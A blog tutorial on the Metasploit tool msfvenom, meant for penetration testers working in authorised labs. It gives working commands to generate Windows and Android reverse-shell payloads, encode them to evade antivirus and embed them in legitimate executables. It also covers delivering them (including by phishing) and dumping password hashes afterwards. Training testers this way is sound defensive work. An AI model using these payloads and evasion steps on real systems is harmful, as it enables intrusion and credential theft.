Professional Tutorial on msfvenom: for Penetration Testing

byEngr. M.A. Rashid Rony
0

Professional Tutorial on msfvenom: for Penetration Testing



Introduction

msfvenom is a standalone payload generation tool within the Metasploit Framework, developed by Rapid7. It is used to create custom payloads and backdoors for penetration testing, allowing security professionals to simulate attacks, test system vulnerabilities, and validate defenses. Unlike the full Metasploit console, msfvenom focuses on generating payloads in various formats (e.g., .exe, .apk, .php) that can be delivered to target systems and paired with Metasploit listeners for exploitation. It is highly versatile, supporting multiple platforms (Windows, Linux, Android, etc.) and incorporating evasion techniques to bypass antivirus software.

This tutorial provides a detailed guide on using msfvenom for ethical penetration testing, covering installation, key features, command-line usage, and a practical example of creating and deploying a payload. Aimed at intermediate pentesters, it assumes familiarity with Linux, networking, and Metasploit basics (as covered in the prior Metasploit tutorial). All activities must be conducted in authorized lab environments (e.g., Web Security Academy, Hack The Box, TryHackMe) to comply with legal and ethical standards. Unauthorized use is illegal and unethical.

This guide draws from official Metasploit documentation, community resources, and aligns with your interest in professional tutorials for tools like Burp Suite, Veil, Discover, sqlmap, Nikto, AndroRAT, TheFatRat, and Metasploit.

What is msfvenom?

msfvenom is a command-line tool that combines the functionality of Metasploit’s former msfpayload and msfencode tools. It generates payloads (e.g., reverse shells, bind shells, Meterpreter) in various formats, encodes them to evade detection, and allows customization for specific attack scenarios. msfvenom is integral to Metasploit’s exploitation workflow, often used to create malicious files delivered via phishing, USB drives, or web vulnerabilities.

Key Features

  • Payload Generation: Creates payloads for Windows, Linux, macOS, Android, and web platforms in formats like .exe, .apk, .php, .py, .elf, and more.
  • Encoding and Evasion: Uses encoders (e.g., shikata_ga_nai) to obfuscate payloads and bypass antivirus detection.
  • Platform Support: Targets multiple architectures (x86, x64, ARM) and operating systems.
  • Customization: Allows configuration of payload options (e.g., LHOST, LPORT) and integration with exploits.
  • Output Formats: Supports executable files, scripts, raw shellcode, and transformable formats (e.g., C, Python).
  • Integration: Works seamlessly with Metasploit’s multi/handler for catching reverse shells and other payloads.
  • Templates: Embeds payloads in existing executables to mimic legitimate files.

System Requirements

  • Operating System: Kali Linux (recommended), Parrot OS, or any Linux distribution with Metasploit installed.
  • Dependencies: Metasploit Framework, Ruby, and optional tools like mingw-w64 for Windows payloads or apktool for Android.
  • Hardware: Minimum 4GB RAM; 8GB+ recommended for complex payload generation.
  • Network: Stable connection for listener setup; lab environment with virtual machines (e.g., VirtualBox, VMware) for testing.
  • Lab Setup: Vulnerable machines like Metasploitable2, Metasploitable3, or a Windows VM for testing.



Installation and Setup

msfvenom is included with the Metasploit Framework, which is pre-installed on Kali Linux. Below are steps to ensure it’s ready for use.

Installation Steps

  1. Update Kali Linux:

sudo apt update && sudo apt upgrade -y

  1. Install Metasploit Framework (if not present):

sudo apt install metasploit-framework -y

  1. Verify msfvenom:

msfvenom --version

Output:

Framework: 6.x.x-dev

msfvenom: 2.x.x

  1. Install Optional Dependencies (for cross-platform payloads):
    • Windows payloads:

sudo apt install mingw-w64 -y

    • Android payloads:

sudo apt install apktool -y

  1. Update Metasploit:

msfupdate

Or via GitHub:

git clone https://github.com/rapid7/metasploit-framework.git

cd metasploit-framework

bundle install

Troubleshooting

  • Command Not Found: Ensure Metasploit is installed (which msfvenom).
  • Dependency Errors: Install missing tools (e.g., mingw-w64, apktool) manually.
  • Updates: Regularly update with msfupdate to access new payloads and encoders.



msfvenom Usage Guide

msfvenom is a command-line tool with a flexible syntax for generating payloads. Below is a detailed overview of its usage.

Basic Command Structure

msfvenom -p <payload> LHOST=<attacker_ip> LPORT=<port> -f <format> -o <output_file>

  • -p <payload>: Specifies the payload (e.g., windows/meterpreter/reverse_tcp).
  • LHOST=<ip>: Attacker’s IP for reverse connections.
  • LPORT=<port>: Listening port (e.g., 4444).
  • -f <format>: Output format (e.g., exe, apk, php, raw).
  • -o <output_file>: Output file path (e.g., shell.exe).
  • -e <encoder>: Encoder for evasion (e.g., x86/shikata_ga_nai).
  • -i <iterations>: Number of encoding iterations.
  • -b <bad_chars>: Avoid specific characters (e.g., \x00).

Common Payloads

  • Windows: windows/meterpreter/reverse_tcp, windows/shell_reverse_tcp.
  • Linux: linux/x86/meterpreter/reverse_tcp, linux/x64/shell_bind_tcp.
  • Android: android/meterpreter/reverse_tcp.
  • Web: php/reverse_php, jsp/shell_reverse_tcp.

Key Options

  • List Payloads:

msfvenom --list payloads

Lists all available payloads (e.g., 600+).

  • List Formats:

msfvenom --list formats

Shows output formats (e.g., exe, dll, elf, apk, py).

  • List Encoders:

msfvenom --list encoders

Displays encoders for evasion (e.g., shikata_ga_nai).

  • Template Injection:

msfvenom -x template.exe -p <payload> -o output.exe

Embeds payload in an existing executable.

  • Custom Bad Characters:

msfvenom -p <payload> -b '\x00\x0a' -f raw

Avoids null bytes and newlines.

Integration with Metasploit

msfvenom payloads are typically used with Metasploit’s multi/handler to catch reverse shells:

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set PAYLOAD <payload>

msf6 exploit(multi/handler) > set LHOST <ip>

msf6 exploit(multi/handler) > set LPORT <port>

msf6 exploit(multi/handler) > exploit

Practical Example: Creating and Deploying a Windows Payload

This example demonstrates using msfvenom to create a Windows Meterpreter reverse shell, deploy it on a lab Windows 10 VM (Metasploitable3 or VirtualBox), and catch the session with Metasploit. Assume the attacker’s Kali Linux IP is 192.168.1.100 and the target is 192.168.1.10.

Step 1: Generate the Payload

  1. Create a Windows executable:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe

Output:

[*] Writing 73802 bytes to shell.exe...

The file shell.exe is saved in the current directory.

  1. Add Encoding for Evasion:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe

    • -e x86/shikata_ga_nai: Uses the Shikata Ga Nai encoder.
    • -i 5: Applies encoding five times. Output:

[*] Writing 75000 bytes to encoded_shell.exe...

Step 2: Set Up Metasploit Listener

  1. Launch Metasploit:

msfconsole

  1. Configure the handler:

3.  msf6 > use exploit/multi/handler

4.  msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp

5.  msf6 exploit(multi/handler) > set LHOST 192.168.1.100

6.  msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

Output:

[*] Started reverse TCP handler on 192.168.1.100:4444

Step 3: Deploy the Payload

  1. Transfer encoded_shell.exe to the target (e.g., via a shared folder, phishing email, or web server).
    • Example: Host on a simple HTTP server:

python3 -m http.server 8000

On the Windows VM, download using a browser: http://192.168.1.100:8000/encoded_shell.exe.

  1. Execute encoded_shell.exe on the Windows VM.

Step 4: Catch the Session

When the payload runs, Metasploit receives a Meterpreter session:

[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.10:54321)

meterpreter > sysinfo

Output:

Computer    : WIN10-VM

OS          : Windows 10 (Build 19041)

Step 5: Post-Exploitation

Use Meterpreter commands:

  • screenshot: Capture the desktop:

meterpreter > screenshot

Output:

Screenshot saved to: /root/.msf4/screenshots/win10_2025-09-06.png

  • hashdump: Dump password hashes:

meterpreter > hashdump

Output:

Administrator:500:aad3b435b51404ee...:e52cac67419a9a224077...

  • shell: Access a command prompt:

meterpreter > shell

Step 6: Test Antivirus Evasion

  • Upload encoded_shell.exe to VirusTotal (https://www.virustotal.com) to check detection rates.
  • If detected, increase encoding iterations (-i 10) or use a different encoder.

Practical Example: Android Payload

For Android (e.g., a Genymotion emulator), generate an APK:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f apk -o android_shell.apk

  1. Install on the emulator:

adb install android_shell.apk

  1. Set up the handler (same as above).
  2. Run the APK; catch the session in Metasploit.



Best Practices and Tips

  • Ethics and Legality: Only test in authorized lab environments (e.g., Metasploitable3, TryHackMe). Unauthorized use is illegal.
  • Lab Setup: Use virtual machines (VirtualBox, VMware) or cloud labs to avoid production risks.
  • Evasion: Combine with tools like Veil or TheFatRat for advanced obfuscation (see prior tutorials).
  • Integration: Pair with Metasploit’s multi/handler, Burp Suite for web delivery, or Nikto/sqlmap for web vulnerabilities.
  • Output Management: Store payloads in /root/.msf4/local/ and review logs in /root/.msf4/logs/.
  • Common Pitfalls:
    • Match payload architecture (e.g., x86 vs. x64) to the target.
    • Ensure LHOST is reachable by the target.
  • Resources:
    • Official Docs: https://docs.metasploit.com
    • GitHub: https://github.com/rapid7/metasploit-framework
    • TryHackMe: “Metasploit” and “Payloads” rooms
    • Hack The Box: “Legacy” or “Metasploitable” machines
    • Web Security Academy: https://portswigger.net/web-security for web payload testing

Visual References

msfvenom is a command-line tool, so visuals are primarily terminal outputs or Metasploit sessions. For screenshots:

  • GitHub: https://github.com/rapid7/metasploit-framework (shows msfvenom commands).
  • TryHackMe: “Metasploit” or “Payloads” rooms display payload generation and handler outputs.
  • Medium Articles: Search “msfvenom tutorial” (e.g., https://medium.com/@youritguy/msfvenom-guide-for-penetration-testing) for terminal screenshots.
  • Hackers Arise: https://hackers-arise.com/post/2023/12/31/msfvenom-guide shows payload creation and execution.



Conclusion

msfvenom is a critical tool for penetration testers, enabling the creation of custom payloads for diverse attack scenarios. By mastering its commands, encoding options, and integration with Metasploit, you can simulate real-world attacks ethically and effectively. Practice in safe lab environments like TryHackMe, Hack The Box, or Web Security Academy to build skills and contribute to stronger cybersecurity.

Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.metasploit.com

 

Tags:

Post a Comment

Previous Post Next Post